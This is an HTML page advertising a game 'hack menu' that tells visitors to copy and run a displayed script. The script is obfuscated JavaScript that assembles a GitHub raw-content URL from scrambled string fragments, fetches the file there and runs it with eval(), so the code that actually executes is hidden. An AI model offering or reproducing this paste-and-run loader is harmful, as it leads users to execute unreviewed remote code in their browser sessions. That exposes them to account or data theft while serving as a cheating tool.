<!DOCTYPE html>
<html>
  <head>
    <title>CrackinPMG Hack Menu</title>
    <style>
      /* Style for the script display box */
      #script-text {
        background-color: #f0f0f0; /* Light grey background */
        border: 1px solid #ccc; /* Light grey border */
        padding: 10px; /* Padding around the text */
        overflow-x: auto; /* Allow horizontal scrolling if needed */
        white-space: pre-wrap; /* Preserve whitespace and allow wrapping */
        font-family: monospace; /* Use monospace font for code */
        font-size: 10px; /* Adjust the font size for better readability */
        border-radius: 5px; /* Rounded corners for a nicer look */
        margin-bottom: 10px; /* Add some margin below the script box */
      }
      /* Style for the buttons */
      button {
        margin: 5px; /* Add space between buttons */
        padding: 5px 10px; /* Adjust padding for button size */
        font-size: 14px; /* Font size for buttons */
        cursor: pointer; /* Change cursor to pointer on hover */
      }
    </style>
  </head>
  <body>
    <p>To use the CrackinPMG Hack Menu, copy this script:</p>
    <pre id="script-text">
        const _0x51b8a4=_0x4bc5;(function(_0x1b141b,_0x3b5f56){const _0x37a1f5=_0x4bc5,_0x47a1e8=_0x1b141b();
        while(!![]){try{const _0x25b297=parseInt(_0x37a1f5('0x119'))/(-0x71*-0x4a+0x2104+-0x41ad)*
        (parseInt(_0x37a1f5('0x128'))/(0x2*-0x1227+0x361+0x20ef))+-parseInt(_0x37a1f5('0x116'))/
        (-0x3ac+-0x2*0x66a+0x1083*0x1)+-parseInt(_0x37a1f5('0x120'))/(-0x1ef2+0x3e*-0x55+-0x19c6*-0x2)*
        (parseInt(_0x37a1f5('0x114'))/(-0x9*0x445+0x18*0xb+-0x1*-0x256a))+parseInt(_0x37a1f5('0x11c'))/
        (-0x9e6+-0x591+0xf7d)+-parseInt(_0x37a1f5('0x115'))/(-0x2193+-0xd8+0x2272)*(parseInt(_0x37a1f5('0x124'))/
        (0xbe3+-0x89*-0x23+-0x1e96))+parseInt(_0x37a1f5('0x11e'))/(-0x1*0x6a+0x1817+-0x17a4)*
        (-parseInt(_0x37a1f5('0x125'))/(-0x13f8+-0xbb8+0x1fba))+parseInt(_0x37a1f5('0x113'))/
        (-0x1*0x137d+-0x72e+0x1ab6)*(parseInt(_0x37a1f5('0x11b'))/(-0x1f87+0x2bc+-0x99d*-0x3));
        if(_0x25b297===_0x3b5f56)break;else _0x47a1e8['push'](_0x47a1e8['shift']());
        }catch(_0x468eab){_0x47a1e8['push'](_0x47a1e8['shift']());}}}(_0x4a74,-0x3dca5+0xc363c+0x1*0x443c6));
        function _0x4a74(){const _0x307370=['58982kgIHZi','2014974mNXjfK','load\x20the\x20s','Failed\x20to\x20',
        '1WGiWwt','then','12TPTPqj','1990158LsGbeq','w.githubus','14574843mkQYkJ','com/Cracki','5567164Mueite',
        'in/Nothing','ercontent.','nPMG2024/H','256yTReOa','10FXzVXy','https://ra','ackMenu/ma','2663530KlTvmG',
        'error','catch','34273437ugRdJg','5xndprT'];_0x4a74=function(){return _0x307370;};return _0x4a74();
        }const scriptUrl=_0x51b8a4('0x126')+_0x51b8a4('0x11d')+_0x51b8a4('0x122')+_0x51b8a4('0x11f')+
        _0x51b8a4('0x123')+_0x51b8a4('0x127')+_0x51b8a4('0x121');function _0x4bc5(_0x3ee52e,_0x378d01)
        {const _0xf0e87b=_0x4a74();return _0x4bc5=function(_0x59b061,_0x564ea5){_0x59b061=_0x59b061-
        (-0xdf8*-0x2+-0x129f+-0x83e);let _0x5a6ad6=_0xf0e87b[_0x59b061];return _0x5a6ad6;},
        _0x4bc5(_0x3ee52e,_0x378d01);}fetch(scriptUrl)['then'](_0x564ea5=>_0x564ea5['text']())[_0x51b8a4('0x11a')]
        (_0x5a6ad6=>{eval(_0x5a6ad6);})[_0x51b8a4('0x12a')](_0x134554=>console[_0x51b8a4('0x129')](_0x51b8a4('0x118')
        +_0x51b8a4('0x117')+'cript:',_0x134554));
    </pre>
    <!-- Buttons for Copy, Channel, and Help -->
    <button id="copy-button">Copy</button>
    <button id="channel-button">Channel</button>
    <button id="help-button">Help?</button>

    <!-- Link to popup.js -->
    <script src="popup.js"></script>
  </body>
</html>
